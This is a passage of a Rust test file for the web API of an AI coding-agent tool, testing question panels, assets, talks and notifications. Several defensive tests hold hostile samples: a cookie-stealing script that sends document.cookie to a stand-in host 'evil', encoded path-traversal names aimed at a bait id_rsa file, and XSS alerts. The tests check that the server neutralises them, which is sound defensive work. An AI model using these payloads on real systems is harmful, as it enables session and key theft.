4687 body: String::from_utf8_lossy(&bytes).into_owned(),
4688 bytes,
4689 }
4690 }
4691
4692 fn write_run(runs: &FsPath, id: &str, status: RunStatus) {
4694 let mut state = RunState::new(
4695 PathBuf::from("/repo/magi"),
4696 "main".to_owned(),
4697 "0123456789abcdef".to_owned(),
4698 "Add a web UI\n\nMobile first.".to_owned(),
4699 Config::default(),
4700 );
4701 state.id = id.to_owned();
4702 state.status = status;
4703 let dir = runs.join(id);
4704 std::fs::create_dir_all(&dir).expect("run dir");
4705 std::fs::write(
4706 dir.join("run.json"),
4707 serde_json::to_string_pretty(&state).expect("serialize run"),
4708 )
4709 .expect("write run.json");
4710 }
4711
4712 fn write_daemon(home: &FsPath, updated_at: Timestamp) {
4713 let body = serde_json::json!({
4714 "schema": 1,
4715 "pid": 4242,
4716 "started_at": Timestamp::now().to_string(),
4717 "updated_at": updated_at.to_string(),
4718 "idle": false,
4719 "current": [{ "task": "20260902-140501-aaaa", "run": "20260902-140502-bbbb" }],
4720 "completed": 7,
4721 "polls": 143,
4722 });
4723 std::fs::write(home.join("daemon.json"), body.to_string()).expect("write daemon.json");
4724 }
4725
4726 fn launch_idle(
4736 _opts: daemon::Opts,
4737 stop: daemon::Stop,
4738 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4739 Box::pin(async move {
4740 while !stop.stopped() {
4741 tokio::time::sleep(Duration::from_millis(2)).await;
4742 }
4743 Ok(())
4744 })
4745 }
4746
4747 fn launch_broken(
4750 _opts: daemon::Opts,
4751 _stop: daemon::Stop,
4752 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4753 Box::pin(async {
4754 Err(anyhow::anyhow!(
4755 "publish the daemon status file: read-only file system"
4756 ))
4757 })
4758 }
4759
4760 static PARK_KNOCK: std::sync::Mutex<Option<SocketAddr>> = std::sync::Mutex::new(None);
4767 static PARK_HEARD: std::sync::Mutex<Option<u16>> = std::sync::Mutex::new(None);
4768
4769 fn launch_knocking_on_the_way_out(
4776 _opts: daemon::Opts,
4777 stop: daemon::Stop,
4778 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4779 Box::pin(async move {
4780 while !stop.stopped() {
4781 tokio::time::sleep(Duration::from_millis(2)).await;
4782 }
4783 let addr = PARK_KNOCK
4784 .lock()
4785 .expect("park knock")
4786 .expect("the test set an address");
4787 let heard = request(addr, "GET", "/api/health", None).await.status;
4788 *PARK_HEARD.lock().expect("park heard") = Some(heard);
4789 Ok(())
4790 })
4791 }
4792
4793 async fn settled(fx: &Fixture, want: fn(&Value) -> bool) -> Value {
4802 for _ in 0..SETTLE_STEPS {
4803 let view = fx.get("/api/loop").await.json();
4804 if want(&view) {
4805 return view;
4806 }
4807 tokio::time::sleep(Duration::from_millis(10)).await;
4808 }
4809 panic!(
4810 "the loop never settled: {}",
4811 fx.get("/api/loop").await.json()
4812 );
4813 }
4814
4815 fn ask(fx: &Fixture, summary: &str, choices: &[&str]) -> String {
4817 let store = fx.questions();
4818 let mut q = Question::new(
4819 "20260902-000000-beef".to_owned(),
4820 "implement".to_owned(),
4821 "impl-A".to_owned(),
4822 summary.to_owned(),
4823 "because it matters".to_owned(),
4824 choices.iter().map(|c| (*c).to_owned()).collect(),
4825 );
4826 store.put(&mut q).expect("put question");
4827 q.id
4828 }
4829
4830 fn panel(fx: &Fixture, html: &str, assets: &[(&str, &[u8])]) -> String {
4836 let store = fx.questions();
4837 let mut q = Question::new(
4838 "20260902-000000-beef".to_owned(),
4839 "land".to_owned(),
4840 "fix".to_owned(),
4841 "Merge this?".to_owned(),
4842 "the diff is in the panel".to_owned(),
4843 vec!["merge".to_owned(), "hold".to_owned()],
4844 );
4845 let staging = fx.home.path().join("staging");
4848 std::fs::create_dir_all(&staging).expect("staging dir");
4849 let sources: Vec<PathBuf> = assets
4850 .iter()
4851 .map(|(name, bytes)| {
4852 let path = staging.join(name);
4853 std::fs::write(&path, bytes).expect("write staged asset");
4854 path
4855 })
4856 .collect();
4857 store
4858 .put_panel(&mut q, html, &sources)
4859 .expect("write the panel");
4860 store.put(&mut q).expect("put question");
4861 q.id
4862 }
4863
4864 fn seed_talk(fx: &Fixture, id: &str, status: &str) -> String {
4873 let store = fx.talks();
4874 std::fs::create_dir_all(store.root()).expect("talks dir");
4875 let seat = serde_json::to_value(crate::agent::SeatState::new("talk", "mock", 7))
4876 .expect("serialize a seat");
4877 let body = serde_json::json!({
4878 "schema": 1,
4879 "id": id,
4880 "repo": "/repo/magi",
4881 "agent": "mock",
4882 "status": status,
4883 "turns": [],
4884 "created_at": Timestamp::now().to_string(),
4885 "updated_at": Timestamp::now().to_string(),
4886 "seat": seat,
4887 });
4888 std::fs::write(store.path_of(id), body.to_string()).expect("write the talk");
4889 store.get(id).expect("the seeded talk has to be readable");
4890 id.to_owned()
4891 }
4892
4893 #[tokio::test]
4894 async fn both_panel_routes_send_the_whole_policy_that_makes_agent_html_safe() {
4895 let fx = Fixture::start().await;
4896 let id = panel(
4897 &fx,
4898 "<h1>Merge?</h1><img src=\"diff.svg\">",
4899 &[("diff.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>")],
4900 );
4901
4902 for path in [
4903 format!("/api/questions/{id}/panel"),
4904 format!("/api/questions/{id}/asset/diff.svg"),
4905 ] {
4906 let res = fx.get(&path).await;
4907 assert_eq!(res.status, 200, "{path}: {}", res.body);
4908 assert_eq!(
4914 res.header("content-security-policy"),
4915 Some(
4916 "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
4917 font-src data:; base-uri 'none'; form-action 'none'; \
4918 frame-ancestors 'self'"
4919 ),
4920 "{path} is the only thing between a hostile panel and the tailnet"
4921 );
4922 assert_eq!(
4923 res.header("x-content-type-options"),
4924 Some("nosniff"),
4925 "{path}: a browser must not re-decide the type we sent"
4926 );
4927 assert_eq!(
4928 res.header("referrer-policy"),
4929 Some("no-referrer"),
4930 "{path}: a panel must not leak the question id off the machine"
4931 );
4932
4933 let pre = fx.head(&path).await;
4938 assert_eq!(pre.status, res.status, "{path}: HEAD must agree with GET");
4939 assert_eq!(
4940 pre.header("content-security-policy"),
4941 res.header("content-security-policy"),
4942 "{path}: the preflight carries the same policy"
4943 );
4944 assert_eq!(
4945 pre.header("content-type"),
4946 res.header("content-type"),
4947 "{path}: the preflight carries the same type"
4948 );
4949 }
4950 }
4951
4952 #[tokio::test]
4953 async fn a_panel_reaches_the_browser_byte_for_byte() {
4954 let fx = Fixture::start().await;
4955 let html = "<h1>Merge?</h1><p>a < b — 変更</p><script>alert(1)</script>";
4960 let id = panel(&fx, html, &[]);
4961
4962 let res = fx.get(&format!("/api/questions/{id}/panel")).await;
4963
4964 assert_eq!(res.status, 200);
4965 assert_eq!(res.bytes, html.as_bytes(), "served verbatim, not sanitised");
4966 assert_eq!(res.header("content-type"), Some("text/html; charset=utf-8"));
4967 assert_eq!(
4968 res.header("content-disposition"),
4969 None,
4970 "the panel itself is rendered in the frame, not downloaded"
4971 );
4972 }
4973
4974 #[tokio::test]
4975 async fn an_svg_asset_is_a_download_and_a_png_is_not() {
4976 let fx = Fixture::start().await;
4977 let svg = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>";
4978 let png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR".as_slice();
4979 let id = panel(
4980 &fx,
4981 "<img src=\"diff.svg\"><img src=\"shot.png\">",
4982 &[("diff.svg", svg), ("shot.png", png)],
4983 );
4984
4985 let as_svg = fx.get(&format!("/api/questions/{id}/asset/diff.svg")).await;
4986 let as_png = fx.get(&format!("/api/questions/{id}/asset/shot.png")).await;
4987
4988 assert_eq!(as_svg.status, 200);
4989 assert_eq!(as_svg.header("content-type"), Some("image/svg+xml"));
4990 assert_eq!(as_svg.header("content-disposition"), Some("attachment"));
4995
4996 assert_eq!(as_png.status, 200);
4997 assert_eq!(as_png.header("content-type"), Some("image/png"));
4998 assert_eq!(
4999 as_png.header("content-disposition"),
5000 None,
5001 "a raster image has no execution surface, so tapping it still shows it"
5002 );
5003 assert_eq!(as_png.bytes, png, "a binary asset survives the round trip");
5004 }
5005
5006 #[tokio::test]
5007 async fn an_html_asset_is_never_served_as_html() {
5008 let fx = Fixture::start().await;
5009 let id = panel(
5010 &fx,
5011 "<p>see the notes</p>",
5012 &[
5013 (
5014 "notes.html",
5015 b"<script>fetch('http://evil/'+document.cookie)</script>",
5016 ),
5017 ("hook.js", b"fetch('http://evil/')"),
5018 ("data.json", b"{}"),
5019 ("HEADLINE.TXT", b"plain"),
5020 ],
5021 );
5022
5023 for name in ["notes.html", "hook.js", "data.json"] {
5024 let res = fx.get(&format!("/api/questions/{id}/asset/{name}")).await;
5025 assert_eq!(res.status, 200, "{name}: {}", res.body);
5026 assert_eq!(
5031 res.header("content-type"),
5032 Some("application/octet-stream"),
5033 "{name} must not be a type the browser will execute or render"
5034 );
5035 }
5036 let txt = fx
5039 .get(&format!("/api/questions/{id}/asset/HEADLINE.TXT"))
5040 .await;
5041 assert_eq!(
5042 txt.header("content-type"),
5043 Some("text/plain; charset=utf-8")
5044 );
5045 }
5046
5047 #[tokio::test]
5048 async fn no_spelling_of_a_traversing_asset_name_reaches_the_filesystem() {
5049 let fx = Fixture::start().await;
5050 let id = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5051 std::fs::write(fx.questions().root().join("id_rsa"), b"secret").expect("write the bait");
5055
5056 for encoded in [
5063 "%2e%2e%2fid_rsa",
5064 "..%2fid_rsa",
5065 "..%5cid_rsa",
5066 "%2e%2e%5cid_rsa",
5067 "diff%00.svg",
5068 "..",
5069 ".hidden",
5070 "%2e%2e%2f%2e%2e%2fid_rsa",
5071 ] {
5072 let res = fx
5073 .get(&format!("/api/questions/{id}/asset/{encoded}"))
5074 .await;
5075 assert_eq!(
5076 res.status, 400,
5077 "`{encoded}` has to be refused by name, not looked up: {}",
5078 res.body
5079 );
5080 assert!(res.json()["error"].is_string(), "{}", res.body);
5081 }
5082
5083 for literal in ["../id_rsa", "../../questions/id_rsa", "..%5c../id_rsa"] {
5089 let res = fx
5090 .get(&format!("/api/questions/{id}/asset/{literal}"))
5091 .await;
5092 assert_eq!(
5093 res.status, 404,
5094 "`{literal}` must not match the asset route at all: {}",
5095 res.body
5096 );
5097 }
5098 }
5099
5100 #[tokio::test]
5101 async fn a_missing_panel_and_an_unknown_asset_are_both_json_404s() {
5102 let fx = Fixture::start().await;
5103 let plain = ask(&fx, "Which backend?", &["SQLite"]);
5104 let with_panel = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5105
5106 let none = fx.get(&format!("/api/questions/{plain}/panel")).await;
5110 assert_eq!(none.status, 404, "{}", none.body);
5111 assert!(none.json()["error"].is_string(), "{}", none.body);
5112 assert_eq!(
5113 fx.head(&format!("/api/questions/{plain}/panel"))
5114 .await
5115 .status,
5116 404,
5117 "the preflight is the only way the client can learn this"
5118 );
5119
5120 let missing = fx
5122 .get(&format!("/api/questions/{with_panel}/asset/absent.png"))
5123 .await;
5124 assert_eq!(missing.status, 404, "{}", missing.body);
5125 assert!(missing.json()["error"].is_string(), "{}", missing.body);
5126
5127 assert_eq!(fx.get("/api/questions/nope/panel").await.status, 404);
5129 assert_eq!(
5130 fx.get("/api/questions/nope/asset/diff.svg").await.status,
5131 404
5132 );
5133 }
5134
5135 #[tokio::test]
5136 async fn a_run_with_an_open_question_reads_as_waiting() {
5137 let fx = Fixture::start().await;
5138 let run = "20260902-000000-beef".to_owned();
5139 write_run(&fx.runs(), &run, RunStatus::Implementing);
5140
5141 let before = fx.get("/api/runs").await.json();
5142 assert_eq!(before[0]["waiting"], false, "{before}");
5143
5144 let store = fx.questions();
5145 let mut q = Question::new(
5146 run.clone(),
5147 "implement".to_owned(),
5148 "impl-A".to_owned(),
5149 "Which backend?".to_owned(),
5150 String::new(),
5151 vec!["SQLite".to_owned()],
5152 );
5153 store.put(&mut q).expect("put");
5154
5155 let during = fx.get("/api/runs").await.json();
5156 assert_eq!(during[0]["waiting"], true, "{during}");
5157
5158 q.answer(Answer::Choice("SQLite".to_owned()))
5161 .expect("answer");
5162 store.put(&mut q).expect("put");
5163 let after = fx.get("/api/runs").await.json();
5164 assert_eq!(after[0]["waiting"], false, "{after}");
5165 }
5166
5167 #[tokio::test]
5168 async fn an_open_question_is_listed_and_counted_by_health() {
5169 let fx = Fixture::start().await;
5170 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5171
5172 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5173 let listed = fx.get("/api/questions").await.json();
5174 assert_eq!(listed.as_array().expect("array").len(), 1);
5175 assert_eq!(listed[0]["id"], id);
5176 assert_eq!(listed[0]["status"], "open");
5177 assert_eq!(listed[0]["choices"][1], "Redis");
5178 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5181 }
5182
5183 #[tokio::test]
5184 async fn answering_records_the_choice_and_a_second_answer_conflicts() {
5185 let fx = Fixture::start().await;
5186 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5187 let path = format!("/api/questions/{id}/answer");
5188
5189 let res = fx.post(&path, Some(r#"{"choice":"Redis"}"#)).await;
5190 assert_eq!(res.status, 200, "{}", res.body);
5191 let body = res.json();
5192 assert_eq!(body["status"], "answered");
5193 assert_eq!(body["answer"]["choice"], "Redis");
5194
5195 let again = fx.post(&path, Some(r#"{"choice":"SQLite"}"#)).await;
5199 assert_eq!(again.status, 409, "{}", again.body);
5200 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5201 }
5202
5203 #[tokio::test]
5204 async fn saying_something_appends_a_turn_without_answering() {
5205 let fx = Fixture::start().await;
5206 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5207 let path = format!("/api/questions/{id}/say");
5208
5209 let res = fx
5210 .post(&path, Some(r#"{"body":"why not Postgres?"}"#))
5211 .await;
5212 assert_eq!(res.status, 200, "{}", res.body);
5213 let body = res.json();
5214 assert_eq!(body["status"], "open", "talking back is not a decision");
5215 assert_eq!(body["answer"], Value::Null);
5216 assert_eq!(body["thread"][0]["who"], "operator");
5217 assert_eq!(body["thread"][0]["body"], "why not Postgres?");
5218 assert_eq!(body["waiting_on_agent"], true);
5219 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5221 }
5222
5223 #[tokio::test]
5224 async fn asking_back_clears_the_owner_count_until_the_agent_replies() {
5225 let fx = Fixture::start().await;
5226 let store = fx.questions();
5227 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5228 assert_eq!(
5229 fx.get("/api/health").await.json()["questions_needs_owner"],
5230 1
5231 );
5232
5233 let res = fx
5239 .post(
5240 &format!("/api/questions/{id}/say"),
5241 Some(r#"{"body":"why not Postgres?"}"#),
5242 )
5243 .await;
5244 assert_eq!(res.status, 200, "{}", res.body);
5245 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5246 assert_eq!(
5247 fx.get("/api/health").await.json()["questions_needs_owner"],
5248 0,
5249 "waiting on the agent is not waiting on the owner"
5250 );
5251
5252 let mut q = store.get(&id).expect("get");
5256 q.reply("because SQLite needs no server", vec!["SQLite".to_owned()])
5257 .expect("reply");
5258 store.put(&mut q).expect("put");
5259 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5260 assert_eq!(
5261 fx.get("/api/health").await.json()["questions_needs_owner"],
5262 1,
5263 "the agent's reply is what should light the banner back up"
5264 );
5265 }
5266
5267 #[tokio::test]
5268 async fn saying_something_is_refused_when_empty_answered_or_abandoned() {
5269 let fx = Fixture::start().await;
5270 let store = fx.questions();
5271
5272 let empty_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5273 let res = fx
5274 .post(
5275 &format!("/api/questions/{empty_id}/say"),
5276 Some(r#"{"body":" "}"#),
5277 )
5278 .await;
5279 assert_eq!(res.status, 400, "{}", res.body);
5280
5281 let answered_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5282 let mut answered = store.get(&answered_id).expect("get");
5283 answered
5284 .answer(Answer::Choice("SQLite".to_owned()))
5285 .expect("answer");
5286 store.put(&mut answered).expect("put");
5287 let res = fx
5288 .post(
5289 &format!("/api/questions/{answered_id}/say"),
5290 Some(r#"{"body":"still there?"}"#),
5291 )
5292 .await;
5293 assert_eq!(res.status, 409, "{}", res.body);
5294
5295 let abandoned_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5296 let mut abandoned = store.get(&abandoned_id).expect("get");
5297 abandoned.abandon("timed out");
5298 store.put(&mut abandoned).expect("put");
5299 let res = fx
5300 .post(
5301 &format!("/api/questions/{abandoned_id}/say"),
5302 Some(r#"{"body":"still there?"}"#),
5303 )
5304 .await;
5305 assert_eq!(res.status, 409, "{}", res.body);
5306 }
5307
5308 #[tokio::test]
5309 async fn an_answer_the_question_does_not_offer_is_refused() {
5310 let fx = Fixture::start().await;
5311 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5312 let path = format!("/api/questions/{id}/answer");
5313
5314 for body in [
5315 r#"{"choice":"Postgres"}"#,
5316 r#"{"text":"whatever you think"}"#,
5317 r#"{"choice":"Redis","text":"both"}"#,
5318 r#"{}"#,
5319 ] {
5320 let res = fx.post(&path, Some(body)).await;
5321 assert_eq!(res.status, 400, "{body} should be refused: {}", res.body);
5322 assert!(res.json()["error"].is_string(), "{}", res.body);
5323 }
5324 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5326 }
5327
5328 #[tokio::test]
5329 async fn a_free_text_question_takes_text_and_not_a_choice() {
5330 let fx = Fixture::start().await;
5331 let id = ask(&fx, "What should the flag be called?", &[]);
5332 let path = format!("/api/questions/{id}/answer");
5333
5334 assert_eq!(
5335 fx.post(&path, Some(r#"{"choice":"--json"}"#)).await.status,
5336 400
5337 );
5338 let res = fx.post(&path, Some(r#"{"text":"--json"}"#)).await;
5339 assert_eq!(res.status, 200, "{}", res.body);
5340 assert_eq!(res.json()["answer"]["text"], "--json");
5341 }
5342
5343 #[tokio::test]
5344 async fn an_unknown_question_is_a_json_404() {
5345 let fx = Fixture::start().await;
5346 let res = fx
5347 .post("/api/questions/nope/answer", Some(r#"{"text":"x"}"#))
5348 .await;
5349 assert_eq!(res.status, 404, "{}", res.body);
5350 assert!(res.json()["error"].is_string());
5351 }
5352
5353 #[tokio::test]
5354 async fn notifications_list_read_dismiss_and_health_agree() {
5355 let fx = Fixture::start().await;
5356 let store = Notices::at(fx.home.path().join("notifications"));
5357 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 0);
5358 let rev0 = fx.get("/api/health").await.json()["notifications_rev"].clone();
5359
5360 let a = store.raise(Notice::warn("task:1", "held")).unwrap();
5361 let b = store.raise(Notice::error("run:2", "blocked")).unwrap();
5362
5363 let health = fx.get("/api/health").await.json();
5364 assert_eq!(health["notifications_unread"], 2);
5365 assert_ne!(
5366 health["notifications_rev"], rev0,
5367 "the badge must move live"
5368 );
5369
5370 let listed = fx.get("/api/notifications").await.json();
5371 assert_eq!(listed["unread"], 2);
5372 assert_eq!(listed["items"].as_array().unwrap().len(), 2);
5373 assert_eq!(listed["items"][0]["severity"], "error", "newest first");
5374
5375 let read = fx
5376 .post(&format!("/api/notifications/{}/read", a.id), None)
5377 .await;
5378 assert_eq!(read.status, 200, "{}", read.body);
5379 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 1);
5380
5381 let gone = fx
5382 .post(&format!("/api/notifications/{}/dismiss", b.id), None)
5383 .await;
5384 assert_eq!(gone.status, 200, "{}", gone.body);
5385 let listed = fx.get("/api/notifications").await.json();
5386 assert_eq!(listed["items"].as_array().unwrap().len(), 1);
5387 assert_eq!(listed["unread"], 0);
5388
5389 store.raise(Notice::info("x", "again")).unwrap();
5390 let all = fx.post("/api/notifications/read-all", None).await;
5391 assert_eq!(all.status, 200, "{}", all.body);
5392 assert_eq!(all.json()["marked"], 1);
5393 assert_eq!(
5394 fx.get("/api/health").await.json()["notifications_unread"],
5395 0
5396 );
5397
5398 let missing = fx.post("/api/notifications/nope/read", None).await;
5399 assert_eq!(missing.status, 404, "{}", missing.body);
5400 assert!(missing.json()["error"].is_string());
5401 }
5402
5403 #[tokio::test]
5410 async fn a_task_cannot_be_filed_over_the_phone_directly() {
5411 let f = Fixture::start().await;
5412
5413 let res = f
5414 .post(
5415 "/api/queue",
5416 Some(r#"{"instruction":"Add a --json flag to magi list"}"#),
5417 )
5418 .await;
5419
5420 assert_eq!(
5421 res.status, 405,
5422 "POST /api/queue must not be a route: {}",
5423 res.body
5424 );
5425 assert!(
5426 f.queue().list().is_empty(),
5427 "a task filed by a route that does not exist must not reach the disk"
5428 );
5429 assert_eq!(f.get("/api/queue").await.status, 200);
5432 }
5433
5434 fn make_checkout(root: &FsPath, host: &str, owner: &str, repo: &str) {
5436 std::fs::create_dir_all(root.join(host).join(owner).join(repo).join(".git"))
5437 .expect("checkout dir");
5438 }
5439
5440 #[tokio::test]
5441 async fn repos_list_returns_name_and_path_for_every_configured_root() {
5442 let tmp = TempDir::new().expect("tempdir");
5443 let repo = tmp.path().join("repo");
5444 std::fs::create_dir_all(&repo).expect("repo dir");
5445 let root = tmp.path().join("root");
5446 make_checkout(&root, "github.com", "yukimemi", "magi");
5447 std::fs::write(
5448 repo.join("magi.toml"),
5449 format!(
5450 "[repos]\nroots = [{:?}]\n",
5451 root.to_string_lossy().into_owned()
5452 ),
5453 )
5454 .expect("write magi.toml");
5455
5456 let f = Fixture::with_repo(repo).await;
5457 let res = f.get("/api/repos").await;
5458 assert_eq!(res.status, 200, "{}", res.body);
5459 let list = res.json();
5460 let repos = list.as_array().expect("an array");
5461 assert_eq!(repos.len(), 1);
5462 assert_eq!(repos[0]["name"], "yukimemi/magi");
5463 assert!(
5464 repos[0]["path"]
5465 .as_str()
5466 .is_some_and(|p| p.ends_with("magi") || p.contains("magi")),
5467 "{list}"
5468 );
5469 }
5470
5471 #[tokio::test]
5472 async fn repos_list_only_rescans_within_the_ttl_when_asked_to() {
5473 let tmp = TempDir::new().expect("tempdir");
5474 let repo = tmp.path().join("repo");
5475 std::fs::create_dir_all(&repo).expect("repo dir");
5476 let root = tmp.path().join("root");
5477 make_checkout(&root, "github.com", "yukimemi", "magi");
5478 std::fs::write(
5479 repo.join("magi.toml"),
5480 format!(
5481 "[repos]\nroots = [{:?}]\nscan_ttl = 3600\n",
5482 root.to_string_lossy().into_owned()
5483 ),
5484 )
5485 .expect("write magi.toml");
5486
5487 let f = Fixture::with_repo(repo).await;
5488 let first = f.get("/api/repos").await;
5489 assert_eq!(first.json().as_array().map(Vec::len), Some(1));
5490
5491 make_checkout(&root, "github.com", "yukimemi", "rvpm");
5494 let second = f.get("/api/repos").await;
5495 assert_eq!(
5496 second.json().as_array().map(Vec::len),
5497 Some(1),
5498 "a fresh cache must not rescan inside the TTL"
5499 );
5500
5501 let refreshed = f.get("/api/repos?refresh=1").await;
5502 assert_eq!(
5503 refreshed.json().as_array().map(Vec::len),
5504 Some(2),
5505 "an explicit refresh must rescan even inside the TTL"
5506 );
5507 }
5508
5509 const MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && printf ok\"]\n";
5515
5516 async fn talk_fixture() -> (TempDir, PathBuf, Fixture) {
5520 let tmp = TempDir::new().expect("tempdir");
5521 let repo = tmp.path().join("repo");
5522 std::fs::create_dir_all(&repo).expect("repo dir");
5523 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5524 let f = Fixture::with_repo(repo.clone()).await;
5525 (tmp, repo, f)
5526 }
5527
5528 #[tokio::test]
5529 async fn posting_a_talk_with_no_body_opens_one_and_takes_no_turn() {
5530 let (_tmp, _repo, f) = talk_fixture().await;
5531
5532 let opened = f.post("/api/talks", None).await;
5535 assert_eq!(opened.status, 201, "{}", opened.body);
5536 let body = opened.json();
5537 assert_eq!(body["status"], "open");
5538 assert_eq!(
5539 body["turns"].as_array().unwrap().len(),
5540 0,
5541 "opening takes no agent turn: there is nothing yet to answer"
5542 );
5543
5544 let also_opened = f.post("/api/talks", Some("{}")).await;
5546 assert_eq!(also_opened.status, 201, "{}", also_opened.body);
5547
5548 let listed = f.get("/api/talks").await.json();
5549 assert_eq!(listed.as_array().unwrap().len(), 2);
5550 }
5551
5552 #[tokio::test]
5553 async fn talk_detail_lists_the_tasks_it_has_filed_and_stays_open() {
5554 let f = Fixture::start().await;
5555 let talk_id = seed_talk(&f, "20260904-014455-ab12", "open");
5556 let queue = f.queue();
5557 let mut mine = Task::new(
5558 "rename the loader".to_owned(),
5559 "rename the loader".to_owned(),
5560 PathBuf::from("/repo/magi"),
5561 Source::Agent {
5562 run: talk_id.clone(),
5563 node: "chat".to_owned(),
5564 },
5565 );
5566 queue.put(&mut mine).expect("file the task");
5567 let mut theirs = Task::new(
5568 "unrelated".to_owned(),
5569 "unrelated".to_owned(),
5570 PathBuf::from("/repo/magi"),
5571 Source::Human,
5572 );
5573 queue.put(&mut theirs).expect("file the task");
5574
5575 let res = f.get(&format!("/api/talks/{talk_id}")).await;
5576 assert_eq!(res.status, 200, "{}", res.body);
5577 let body = res.json();
5578 assert_eq!(
5579 body["status"], "open",
5580 "filing a task does not close a talk"
5581 );
5582 let tasks = body["tasks"].as_array().expect("tasks array");
5583 assert_eq!(tasks.len(), 1, "only this talk's own task is listed");
5584 assert_eq!(tasks[0]["id"], mine.id);
5585 }
5586
5587 #[tokio::test]
5588 async fn talk_say_records_the_operators_turn_before_the_agents_reply_lands() {
5589 let (_tmp, _repo, f) = talk_fixture().await;
5590 let id = f.post("/api/talks", None).await.json()["id"]
5591 .as_str()
5592 .expect("id")
5593 .to_owned();
5594
5595 let res = f
5596 .post(
5597 &format!("/api/talks/{id}/say"),
5598 Some(r#"{"text":"what does the queue module do?"}"#),
5599 )
5600 .await;
5601 assert_eq!(res.status, 202, "{}", res.body);
5602 let queued = res.json();
5603 let turns = queued["turns"].as_array().expect("turns array");
5604 assert_eq!(
5605 turns.len(),
5606 1,
5607 "the answer reflects only what is on disk the instant it is sent, \
5608 before the agent's turn - which can run for the whole of \
5609 `[graph] timeout_talk` - has a chance to land: {queued}"
5610 );
5611 assert_eq!(turns[0]["who"], "operator");
5612 assert_eq!(turns[0]["body"], "what does the queue module do?");
5613 assert_eq!(
5614 queued["thinking"], true,
5615 "the accepted response exposes the background turn claim: {queued}"
5616 );
5617
5618 let mut turns_after = 1;
5619 for _ in 0..SETTLE_STEPS {
5620 let detail = f.get(&format!("/api/talks/{id}")).await.json();
5621 turns_after = detail["turns"].as_array().expect("turns array").len();
5622 if turns_after == 2 {
5623 break;
5624 }
5625 tokio::time::sleep(Duration::from_millis(10)).await;
5626 }
5627 assert_eq!(turns_after, 2, "the agent's reply eventually lands");
5628 }
5629
5630 #[tokio::test]
5657 async fn a_dropped_handler_future_after_recording_still_gets_an_agent_reply() {
5658 let tmp = TempDir::new().expect("tempdir");
5659 let repo = tmp.path().join("repo");
5660 std::fs::create_dir_all(&repo).expect("repo dir");
5661 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5662 let home = TempDir::new().expect("temp home");
5663 let talks = Talks::at(home.path().join("talks"));
5664 let ui = Arc::new(
5665 Ui::new(
5666 Queue::at(home.path().join("queue")),
5667 Questions::at(home.path().join("questions")),
5668 talks.clone(),
5669 home.path().join("runs"),
5670 home.path().to_path_buf(),
5671 repo.clone(),
5672 )
5673 .with_worktrees_root(home.path().join("wt")),
5674 );
5675 let cfg = config_for(&repo).await.expect("discover config");
5676
5677 for delay in 0..40u32 {
5678 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5679 let id = talk.id.clone();
5680
5681 let handler = tokio::spawn(talk_say(
5682 State(Arc::clone(&ui)),
5683 Path(id.clone()),
5684 Ok(Json(NewTalkTurn {
5685 text: "what does the queue module do?".to_owned(),
5686 attachments: Vec::new(),
5687 })),
5688 ));
5689 tokio::time::sleep(Duration::from_micros(u64::from(delay) * 500)).await;
5690 handler.abort();
5691 let _ = handler.await;
5694
5695 let mut turns = 0;
5696 for _ in 0..SETTLE_STEPS {
5697 if let Ok(fresh) = talks.get(&id) {
5698 turns = fresh.turns.len();
5699 if turns != 1 {
5700 break;
5701 }
5702 }
5703 tokio::time::sleep(Duration::from_millis(10)).await;
5704 }
5705 assert_ne!(
5706 turns, 1,
5707 "delay {delay}: talk {id} recorded the operator's turn but \
5708 the agent never answered - the reply task was never \
5709 started after the handler future was dropped"
5710 );
5711 }
5712 }
5713
5714 #[tokio::test]
5759 async fn a_dropped_handler_future_after_queueing_still_drains_the_draft() {
5760 let tmp = TempDir::new().expect("tempdir");
5761 let repo = tmp.path().join("repo");
5762 std::fs::create_dir_all(&repo).expect("repo dir");
5763 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5764 let home = TempDir::new().expect("temp home");
5765 let talks = Talks::at(home.path().join("talks"));
5766 let ui = Arc::new(
5767 Ui::new(
5768 Queue::at(home.path().join("queue")),
5769 Questions::at(home.path().join("questions")),
5770 talks.clone(),
5771 home.path().join("runs"),
5772 home.path().to_path_buf(),
5773 repo.clone(),
5774 )
5775 .with_worktrees_root(home.path().join("wt")),
5776 );
5777 let cfg = config_for(&repo).await.expect("discover config");
5778
5779 for attempt in 0..3u32 {
5780 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5781 let id = talk.id.clone();
5782 let turn_guard = ui
5785 .begin_talk_turn(&id)
5786 .expect("claim the turn")
5787 .expect("a fresh talk owes nobody a turn");
5788
